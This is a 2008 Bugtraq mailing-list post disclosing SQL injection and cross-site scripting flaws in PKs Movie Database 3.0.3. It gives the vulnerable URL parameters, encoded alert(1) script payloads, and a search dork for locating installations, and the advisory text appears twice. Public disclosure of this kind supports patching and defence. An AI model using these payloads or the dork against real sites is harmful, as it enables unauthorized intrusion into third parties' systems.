Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
PKs Movie Database version 3.0.3 (SQL/XSS)
Feb 09 2008 09:29PM
houssamix hotmail fr
-------------------------------------------------------------
H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
-------------------------------------------------------------
= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3
= BUG 1 : Remote SQL Injection Vulnerability
exploit => www.target.com/path/index.php?num=[SQL]
= BUG 2 : XSS
exploit => www.target.com/path/index.php?category=[XSS]
www.target.com/path/index.php?num=9999999999&category=[XSS]
example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/sc
ript%3E
www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3E
alert(1);%3C/script%3E
= Dork : "PKs Movie Database"
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo
-------------------------------------------------------------
= Author : HouSSaMix From H-T Team
= Script : PKs Movie Database version 3.0.3
= BUG 1 : Remote SQL Injection Vulnerability
exploit => www.target.com/path/index.php?num=[SQL]
= BUG 2 : XSS
exploit => www.target.com/path/index.php?category=[XSS]
www.target.com/path/index.php?num=9999999999&category=[XSS]
example : www.target.com/path/index.php?category=%22%3E%3Cscript%3Ealert(1);%3C/sc
ript%3E
www.target.com/path/index.php?num=9999999999&category=%22%3E%3Cscript%3E
alert(1);%3C/script%3E
= Dork : "PKs Movie Database"
[ reply ]